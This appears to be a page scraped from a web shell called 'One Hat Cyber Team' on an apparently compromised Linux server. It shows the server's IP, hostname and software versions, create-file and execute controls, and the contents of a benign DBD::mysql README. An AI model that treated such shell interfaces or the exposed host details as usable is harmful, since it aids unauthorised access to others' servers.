⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.62
Server IP:
50.6.168.112
Server:
Linux server-617809.webnetzimbabwe.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
Server Software:
Apache
PHP Version:
8.4.10
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
.cpan
/
build
/
DBD-mysql-5.008-0
/
View File Name :
README.md
[](https://github.com/perl5-dbi/DBD-mysql/actions/workflows/ci.yml) # DBD::mysql - database driver for Perl This is the Perl [DBI](https://metacpan.org/pod/DBI) driver for access to MySQL and MySQL Compatible databases. ## Usage Usage is described in [DBD::mysql](https://metacpan.org/pod/DBD::mysql). ## Building and Testing For building DBD::mysql you need a MySQL 8.x or newer client library. ``` perl Makefile.PL make make test ``` See the output of `perl Makefile.PL` for how to set database credentials. Testing is also done via GitHub action. ## Installation Installation is described in [DBD::mysql::INSTALL](https://metacpan.org/pod/DBD::mysql::INSTALL). ## Support This module is maintained and supported on a mailing list, dbi-users. To subscribe to this list, send an email to dbi-users-subscribe@perl.org Mailing list archives are at [http://groups.google.com/group/perl.dbi.users](http://groups.google.com/group/perl.dbi.users)